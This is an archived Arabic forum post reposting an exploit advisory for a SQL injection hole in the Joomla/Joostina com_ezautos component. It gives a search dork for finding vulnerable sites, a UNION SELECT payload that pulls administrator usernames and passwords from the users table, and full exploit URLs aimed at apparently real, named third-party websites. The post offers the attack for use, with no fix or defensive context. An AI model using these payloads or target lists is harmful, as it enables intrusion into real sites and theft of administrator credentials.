المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : Joomla (joostina) Component com_ezautos SQL Injection Vulnerability



zazaxp
09-23-2010, 04:28 AM
Joomla (joostina) Component com_ezautos SQL Injection Vulnerability

###########################

Author : Gamoscu

Homepage : http://www.1923turk.com

Blog :http://gamoscu.wordpress.com/

Script : Joomla http://www.joostina-cms.org/content/view/20/35/

Dork : inurl:com_ezautos
###########################

[ Vulnerable File ]

index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]

[ XpL ]

+and+0+union+select+1,2,concat(username,0x3a,passw ord),4,5,6,7+from+%23__users+where+gid=25+or+gid=2 4+and+block%3C%3E1--

[ Demo]

http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username ,0x3a,password),4,5,6,7+from+%23__users+where+gid= 25+or+gid=24+and+block%3C%3E1--

################################################## ############
#
#
#
# Baybora: http://baybora.wordpress.com/
#
# Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
#
#
#
# #Elektrikist#
#
#############################################


دورك

Dork : inurl:com_ezautos


إستغلال

http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username ,0x3a,password),4,5,6,7+from+%23__users+where+gid= 25+or+gid=24+and+block%3C%3E1--
موقع الاول مصاب

http://www.kokar.co.uk/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username ,0x3a,password),4,5,6,7+from+%23__users+where+gid= 25+or+gid=24+and+block%3C%3E1--

2

http://www.whatboat.com/http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username ,0x3a,password),4,5,6,7+from+%23__users+where+gid= 25+or+gid=24+and+block%3C%3E1--